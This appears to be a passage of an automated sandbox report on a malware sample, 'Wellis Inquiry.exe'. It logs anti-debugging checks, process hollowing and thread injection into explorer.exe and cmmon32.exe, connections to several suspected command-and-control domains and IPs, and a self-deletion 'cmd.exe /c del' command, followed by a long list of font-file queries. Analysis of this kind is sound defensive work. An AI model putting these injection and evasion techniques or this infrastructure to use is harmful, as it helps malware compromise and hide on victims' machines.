Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 11_2_0470E730 mov eax, dword ptr fs:[00000030h]	11_2_0470E730
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 11_2_046D4F2E mov eax, dword ptr fs:[00000030h]	11_2_046D4F2E
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 11_2_046D4F2E mov eax, dword ptr fs:[00000030h]	11_2_046D4F2E
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 11_2_046FB73D mov eax, dword ptr fs:[00000030h]	11_2_046FB73D
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 11_2_046FB73D mov eax, dword ptr fs:[00000030h]	11_2_046FB73D
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 11_2_0476FF10 mov eax, dword ptr fs:[00000030h]	11_2_0476FF10
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 11_2_0476FF10 mov eax, dword ptr fs:[00000030h]	11_2_0476FF10
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 11_2_047A070D mov eax, dword ptr fs:[00000030h]	11_2_047A070D
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 11_2_047A070D mov eax, dword ptr fs:[00000030h]	11_2_047A070D
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 11_2_046FF716 mov eax, dword ptr fs:[00000030h]	11_2_046FF716
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 11_2_0470A70E mov eax, dword ptr fs:[00000030h]	11_2_0470A70E
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 11_2_0470A70E mov eax, dword ptr fs:[00000030h]	11_2_0470A70E
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 11_2_047137F5 mov eax, dword ptr fs:[00000030h]	11_2_047137F5
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 11_2_04757794 mov eax, dword ptr fs:[00000030h]	11_2_04757794
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 11_2_04757794 mov eax, dword ptr fs:[00000030h]	11_2_04757794
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 11_2_04757794 mov eax, dword ptr fs:[00000030h]	11_2_04757794
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 11_2_046E8794 mov eax, dword ptr fs:[00000030h]	11_2_046E8794
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 11_2_04792073 mov eax, dword ptr fs:[00000030h]	11_2_04792073
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 11_2_047A1074 mov eax, dword ptr fs:[00000030h]	11_2_047A1074
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 11_2_046F0050 mov eax, dword ptr fs:[00000030h]	11_2_046F0050
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 11_2_046F0050 mov eax, dword ptr fs:[00000030h]	11_2_046F0050
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 11_2_046EB02A mov eax, dword ptr fs:[00000030h]	11_2_046EB02A
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 11_2_046EB02A mov eax, dword ptr fs:[00000030h]	11_2_046EB02A
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 11_2_046EB02A mov eax, dword ptr fs:[00000030h]	11_2_046EB02A
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 11_2_046EB02A mov eax, dword ptr fs:[00000030h]	11_2_046EB02A
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 11_2_0470002D mov eax, dword ptr fs:[00000030h]	11_2_0470002D
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 11_2_0470002D mov eax, dword ptr fs:[00000030h]	11_2_0470002D
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 11_2_0470002D mov eax, dword ptr fs:[00000030h]	11_2_0470002D
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 11_2_0470002D mov eax, dword ptr fs:[00000030h]	11_2_0470002D
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 11_2_0470002D mov eax, dword ptr fs:[00000030h]	11_2_0470002D
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 11_2_046FA830 mov eax, dword ptr fs:[00000030h]	11_2_046FA830
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 11_2_046FA830 mov eax, dword ptr fs:[00000030h]	11_2_046FA830
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 11_2_046FA830 mov eax, dword ptr fs:[00000030h]	11_2_046FA830
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 11_2_046FA830 mov eax, dword ptr fs:[00000030h]	11_2_046FA830
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 11_2_04757016 mov eax, dword ptr fs:[00000030h]	11_2_04757016
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 11_2_04757016 mov eax, dword ptr fs:[00000030h]	11_2_04757016
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 11_2_04757016 mov eax, dword ptr fs:[00000030h]	11_2_04757016
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 11_2_047A4015 mov eax, dword ptr fs:[00000030h]	11_2_047A4015
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 11_2_047A4015 mov eax, dword ptr fs:[00000030h]	11_2_047A4015
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 11_2_046D58EC mov eax, dword ptr fs:[00000030h]	11_2_046D58EC
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 11_2_046FB8E4 mov eax, dword ptr fs:[00000030h]	11_2_046FB8E4
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 11_2_046FB8E4 mov eax, dword ptr fs:[00000030h]	11_2_046FB8E4
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 11_2_046D40E1 mov eax, dword ptr fs:[00000030h]	11_2_046D40E1
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 11_2_046D40E1 mov eax, dword ptr fs:[00000030h]	11_2_046D40E1
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 11_2_046D40E1 mov eax, dword ptr fs:[00000030h]	11_2_046D40E1

Source: C:\Users\user\Desktop\Wellis Inquiry.exe	Process queried: DebugPort			Jump to behavior
Source: C:\Windows\SysWOW64\cmmon32.exe	Process queried: DebugPort			Jump to behavior

Source: C:\Users\user\Desktop\Wellis Inquiry.exe

Code function: 3_2_00409B40 LdrLoadDll,

3_2_00409B40

Source: C:\Users\user\Desktop\Wellis Inquiry.exe

Memory allocated: page read and write | page guard

Jump to behavior

HIPS / PFW / Operating System Protection Evasion:

System process connects to network (likely due to code injection or exploit)

Show sources

Source: C:\Windows\explorer.exe	Domain query: www.marunouchi1.com
Source: C:\Windows\explorer.exe	Network Connect: 183.90.240.3 80	Jump to behavior
Source: C:\Windows\explorer.exe	Network Connect: 151.106.117.36 80	Jump to behavior
Source: C:\Windows\explorer.exe	Domain query: www.richartware.com
Source: C:\Windows\explorer.exe	Network Connect: 23.227.38.74 80	Jump to behavior
Source: C:\Windows\explorer.exe	Domain query: www.ebookgratis.online
Source: C:\Windows\explorer.exe	Network Connect: 199.59.242.153 80	Jump to behavior
Source: C:\Windows\explorer.exe	Domain query: www.ovmfinacial.com
Source: C:\Windows\explorer.exe	Network Connect: 34.102.136.180 80	Jump to behavior
Source: C:\Windows\explorer.exe	Domain query: www.blackmagiccomics.com
Source: C:\Windows\explorer.exe	Domain query: www.psychedeliccosmetics.com
Source: C:\Windows\explorer.exe	Domain query: www.dollpartyla.com
Source: C:\Windows\explorer.exe	Domain query: www.aceserial.xyz
Source: C:\Windows\explorer.exe	Network Connect: 104.21.2.218 80	Jump to behavior

Sample uses process hollowing technique

Show sources

Source: C:\Users\user\Desktop\Wellis Inquiry.exe

Section unmapped: C:\Windows\SysWOW64\cmmon32.exe base address: 2C0000

Jump to behavior

Maps a DLL or memory area into another process

Show sources

Source: C:\Users\user\Desktop\Wellis Inquiry.exe	Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write	Jump to behavior
Source: C:\Users\user\Desktop\Wellis Inquiry.exe	Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write	Jump to behavior
Source: C:\Users\user\Desktop\Wellis Inquiry.exe	Section loaded: unknown target: C:\Windows\SysWOW64\cmmon32.exe protection: execute and read and write	Jump to behavior
Source: C:\Users\user\Desktop\Wellis Inquiry.exe	Section loaded: unknown target: C:\Windows\SysWOW64\cmmon32.exe protection: execute and read and write	Jump to behavior
Source: C:\Windows\SysWOW64\cmmon32.exe	Section loaded: unknown target: C:\Windows\explorer.exe protection: read write	Jump to behavior
Source: C:\Windows\SysWOW64\cmmon32.exe	Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write	Jump to behavior

Queues an APC in another process (thread injection)

Show sources

Source: C:\Users\user\Desktop\Wellis Inquiry.exe

Thread APC queued: target process: C:\Windows\explorer.exe

Jump to behavior

Modifies the context of a thread in another process (thread injection)

Show sources

Source: C:\Users\user\Desktop\Wellis Inquiry.exe	Thread register set: target process: 3424	Jump to behavior
Source: C:\Users\user\Desktop\Wellis Inquiry.exe	Thread register set: target process: 3424	Jump to behavior
Source: C:\Windows\SysWOW64\cmmon32.exe	Thread register set: target process: 3424	Jump to behavior

Source: C:\Users\user\Desktop\Wellis Inquiry.exe	Process created: C:\Users\user\Desktop\Wellis Inquiry.exe C:\Users\user\Desktop\Wellis Inquiry.exe			Jump to behavior
Source: C:\Windows\SysWOW64\cmmon32.exe	Process created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\Desktop\Wellis Inquiry.exe'			Jump to behavior

Source: explorer.exe, 00000004.00000000.691080863.0000000000AD8000.00000004.00000020.sdmp	Binary or memory string: ProgmanMD6
Source: explorer.exe, 00000004.00000000.705317184.0000000001080000.00000002.00020000.sdmp	Binary or memory string: Program Manager
Source: explorer.exe, 00000004.00000000.705317184.0000000001080000.00000002.00020000.sdmp	Binary or memory string: Shell_TrayWnd
Source: explorer.exe, 00000004.00000000.705317184.0000000001080000.00000002.00020000.sdmp	Binary or memory string: Progman
Source: explorer.exe, 00000004.00000000.705317184.0000000001080000.00000002.00020000.sdmp	Binary or memory string: Progmanlock
Source: explorer.exe, 00000004.00000000.697371801.000000000A716000.00000004.00000001.sdmp	Binary or memory string: Shell_TrayWnd5D

Source: C:\Users\user\Desktop\Wellis Inquiry.exe	Queries volume information: C:\Users\user\Desktop\Wellis Inquiry.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Wellis Inquiry.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Wellis Inquiry.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Wellis Inquiry.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Wellis Inquiry.exe	Queries volume information: C:\Windows\Fonts\arial.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Wellis Inquiry.exe	Queries volume information: C:\Windows\Fonts\ariali.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Wellis Inquiry.exe	Queries volume information: C:\Windows\Fonts\arialbd.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Wellis Inquiry.exe	Queries volume information: C:\Windows\Fonts\arialbi.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Wellis Inquiry.exe	Queries volume information: C:\Windows\Fonts\ARIALN.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Wellis Inquiry.exe	Queries volume information: C:\Windows\Fonts\ariblk.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Wellis Inquiry.exe	Queries volume information: C:\Windows\Fonts\ARIALNI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Wellis Inquiry.exe	Queries volume information: C:\Windows\Fonts\ARIALNB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Wellis Inquiry.exe	Queries volume information: C:\Windows\Fonts\ARIALNBI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Wellis Inquiry.exe	Queries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Wellis Inquiry.exe	Queries volume information: C:\Windows\Fonts\calibri.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Wellis Inquiry.exe	Queries volume information: C:\Windows\Fonts\calibril.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Wellis Inquiry.exe	Queries volume information: C:\Windows\Fonts\calibrii.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Wellis Inquiry.exe	Queries volume information: C:\Windows\Fonts\calibrili.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Wellis Inquiry.exe	Queries volume information: C:\Windows\Fonts\calibrib.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Wellis Inquiry.exe	Queries volume information: C:\Windows\Fonts\calibriz.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Wellis Inquiry.exe	Queries volume information: C:\Windows\Fonts\cambria.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Wellis Inquiry.exe	Queries volume information: C:\Windows\Fonts\cambriai.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Wellis Inquiry.exe	Queries volume information: C:\Windows\Fonts\cambriab.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Wellis Inquiry.exe	Queries volume information: C:\Windows\Fonts\cambriaz.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Wellis Inquiry.exe	Queries volume information: C:\Windows\Fonts\Candara.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Wellis Inquiry.exe	Queries volume information: C:\Windows\Fonts\Candarai.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Wellis Inquiry.exe	Queries volume information: C:\Windows\Fonts\Candarab.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Wellis Inquiry.exe	Queries volume information: C:\Windows\Fonts\Candaraz.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Wellis Inquiry.exe	Queries volume information: C:\Windows\Fonts\comic.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Wellis Inquiry.exe	Queries volume information: C:\Windows\Fonts\comici.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Wellis Inquiry.exe	Queries volume information: C:\Windows\Fonts\comicbd.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Wellis Inquiry.exe	Queries volume information: C:\Windows\Fonts\comicz.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Wellis Inquiry.exe	Queries volume information: C:\Windows\Fonts\consola.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Wellis Inquiry.exe	Queries volume information: C:\Windows\Fonts\consolai.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Wellis Inquiry.exe	Queries volume information: C:\Windows\Fonts\consolab.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Wellis Inquiry.exe	Queries volume information: C:\Windows\Fonts\consolaz.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Wellis Inquiry.exe	Queries volume information: C:\Windows\Fonts\constan.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Wellis Inquiry.exe	Queries volume information: C:\Windows\Fonts\constani.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Wellis Inquiry.exe	Queries volume information: C:\Windows\Fonts\constanb.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Wellis Inquiry.exe	Queries volume information: C:\Windows\Fonts\constanz.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Wellis Inquiry.exe	Queries volume information: C:\Windows\Fonts\corbel.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Wellis Inquiry.exe	Queries volume information: C:\Windows\Fonts\corbeli.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Wellis Inquiry.exe	Queries volume information: C:\Windows\Fonts\corbelb.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Wellis Inquiry.exe	Queries volume information: C:\Windows\Fonts\corbelz.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Wellis Inquiry.exe	Queries volume information: C:\Windows\Fonts\cour.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Wellis Inquiry.exe	Queries volume information: C:\Windows\Fonts\couri.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Wellis Inquiry.exe	Queries volume information: C:\Windows\Fonts\courbd.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Wellis Inquiry.exe	Queries volume information: C:\Windows\Fonts\courbi.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Wellis Inquiry.exe	Queries volume information: C:\Windows\Fonts\ebrima.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Wellis Inquiry.exe	Queries volume information: C:\Windows\Fonts\ebrimabd.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Wellis Inquiry.exe	Queries volume information: C:\Windows\Fonts\framd.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Wellis Inquiry.exe	Queries volume information: C:\Windows\Fonts\FRADM.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Wellis Inquiry.exe	Queries volume information: C:\Windows\Fonts\framdit.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Wellis Inquiry.exe	Queries volume information: C:\Windows\Fonts\FRADMIT.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Wellis Inquiry.exe	Queries volume information: C:\Windows\Fonts\FRAMDCN.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Wellis Inquiry.exe	Queries volume information: C:\Windows\Fonts\FRADMCN.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Wellis Inquiry.exe	Queries volume information: C:\Windows\Fonts\FRAHV.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Wellis Inquiry.exe	Queries volume information: C:\Windows\Fonts\FRAHVIT.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Wellis Inquiry.exe	Queries volume information: C:\Windows\Fonts\Gabriola.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Wellis Inquiry.exe	Queries volume information: C:\Windows\Fonts\gadugi.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Wellis Inquiry.exe	Queries volume information: C:\Windows\Fonts\gadugib.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Wellis Inquiry.exe	Queries volume information: C:\Windows\Fonts\georgia.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Wellis Inquiry.exe	Queries volume information: C:\Windows\Fonts\georgiai.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Wellis Inquiry.exe	Queries volume information: C:\Windows\Fonts\georgiab.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Wellis Inquiry.exe	Queries volume information: C:\Windows\Fonts\georgiaz.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Wellis Inquiry.exe	Queries volume information: C:\Windows\Fonts\impact.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Wellis Inquiry.exe	Queries volume information: C:\Windows\Fonts\Inkfree.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Wellis Inquiry.exe	Queries volume information: C:\Windows\Fonts\javatext.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Wellis Inquiry.exe	Queries volume information: C:\Windows\Fonts\LeelawUI.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Wellis Inquiry.exe	Queries volume information: C:\Windows\Fonts\LeelUIsl.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Wellis Inquiry.exe	Queries volume information: C:\Windows\Fonts\LeelaUIb.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Wellis Inquiry.exe	Queries volume information: C:\Windows\Fonts\lucon.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Wellis Inquiry.exe	Queries volume information: C:\Windows\Fonts\l_10646.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Wellis Inquiry.exe	Queries volume information: C:\Windows\Fonts\malgun.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Wellis Inquiry.exe	Queries volume information: C:\Windows\Fonts\malgunsl.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Wellis Inquiry.exe	Queries volume information: C:\Windows\Fonts\malgunbd.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Wellis Inquiry.exe	Queries volume information: C:\Windows\Fonts\himalaya.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Wellis Inquiry.exe	Queries volume information: C:\Windows\Fonts\msjh.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Wellis Inquiry.exe	Queries volume information: C:\Windows\Fonts\msjhl.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Wellis Inquiry.exe	Queries volume information: C:\Windows\Fonts\msjhbd.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Wellis Inquiry.exe	Queries volume information: C:\Windows\Fonts\ntailu.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Wellis Inquiry.exe	Queries volume information: C:\Windows\Fonts\ntailub.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Wellis Inquiry.exe	Queries volume information: C:\Windows\Fonts\phagspa.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Wellis Inquiry.exe	Queries volume information: C:\Windows\Fonts\phagspab.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Wellis Inquiry.exe	Queries volume information: C:\Windows\Fonts\micross.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Wellis Inquiry.exe	Queries volume information: C:\Windows\Fonts\taile.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Wellis Inquiry.exe	Queries volume information: C:\Windows\Fonts\taileb.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Wellis Inquiry.exe	Queries volume information: C:\Windows\Fonts\msyh.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Wellis Inquiry.exe	Queries volume information: C:\Windows\Fonts\msyhl.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Wellis Inquiry.exe	Queries volume information: C:\Windows\Fonts\msyhbd.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Wellis Inquiry.exe	Queries volume information: C:\Windows\Fonts\msyi.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Wellis Inquiry.exe	Queries volume information: C:\Windows\Fonts\mingliub.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Wellis Inquiry.exe	Queries volume information: C:\Windows\Fonts\monbaiti.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Wellis Inquiry.exe	Queries volume information: C:\Windows\Fonts\msgothic.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Wellis Inquiry.exe	Queries volume information: C:\Windows\Fonts\mvboli.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Wellis Inquiry.exe	Queries volume information: C:\Windows\Fonts\mmrtext.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Wellis Inquiry.exe	Queries volume information: C:\Windows\Fonts\mmrtextb.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Wellis Inquiry.exe	Queries volume information: C:\Windows\Fonts\Nirmala.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Wellis Inquiry.exe	Queries volume information: C:\Windows\Fonts\NirmalaS.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Wellis Inquiry.exe	Queries volume information: C:\Windows\Fonts\NirmalaB.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Wellis Inquiry.exe	Queries volume information: C:\Windows\Fonts\pala.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Wellis Inquiry.exe	Queries volume information: C:\Windows\Fonts\palai.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Wellis Inquiry.exe	Queries volume information: C:\Windows\Fonts\palab.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Wellis Inquiry.exe	Queries volume information: C:\Windows\Fonts\palabi.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Wellis Inquiry.exe	Queries volume information: C:\Windows\Fonts\segoepr.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Wellis Inquiry.exe	Queries volume information: C:\Windows\Fonts\segoeprb.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Wellis Inquiry.exe	Queries volume information: C:\Windows\Fonts\segoesc.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Wellis Inquiry.exe	Queries volume information: C:\Windows\Fonts\segoescb.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Wellis Inquiry.exe	Queries volume information: C:\Windows\Fonts\seguiemj.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Wellis Inquiry.exe	Queries volume information: C:\Windows\Fonts\seguihis.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Wellis Inquiry.exe	Queries volume information: C:\Windows\Fonts\seguisym.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Wellis Inquiry.exe	Queries volume information: C:\Windows\Fonts\simsun.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Wellis Inquiry.exe	Queries volume information: C:\Windows\Fonts\simsunb.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Wellis Inquiry.exe	Queries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Wellis Inquiry.exe	Queries volume information: C:\Windows\Fonts\SitkaI.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Wellis Inquiry.exe	Queries volume information: C:\Windows\Fonts\SitkaB.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Wellis Inquiry.exe	Queries volume information: C:\Windows\Fonts\SitkaZ.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Wellis Inquiry.exe	Queries volume information: C:\Windows\Fonts\sylfaen.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Wellis Inquiry.exe	Queries volume information: C:\Windows\Fonts\symbol.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Wellis Inquiry.exe	Queries volume information: C:\Windows\Fonts\tahoma.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Wellis Inquiry.exe	Queries volume information: C:\Windows\Fonts\tahomabd.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Wellis Inquiry.exe	Queries volume information: C:\Windows\Fonts\trebuc.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Wellis Inquiry.exe	Queries volume information: C:\Windows\Fonts\trebucit.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Wellis Inquiry.exe	Queries volume information: C:\Windows\Fonts\trebucbd.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Wellis Inquiry.exe	Queries volume information: C:\Windows\Fonts\trebucbi.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Wellis Inquiry.exe	Queries volume information: C:\Windows\Fonts\verdana.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Wellis Inquiry.exe	Queries volume information: C:\Windows\Fonts\verdanai.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Wellis Inquiry.exe	Queries volume information: C:\Windows\Fonts\verdanab.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Wellis Inquiry.exe	Queries volume information: C:\Windows\Fonts\verdanaz.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Wellis Inquiry.exe	Queries volume information: C:\Windows\Fonts\webdings.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Wellis Inquiry.exe	Queries volume information: C:\Windows\Fonts\wingding.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Wellis Inquiry.exe	Queries volume information: C:\Windows\Fonts\YuGothR.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Wellis Inquiry.exe	Queries volume information: C:\Windows\Fonts\YuGothM.ttc VolumeInformation	Jump to behavior
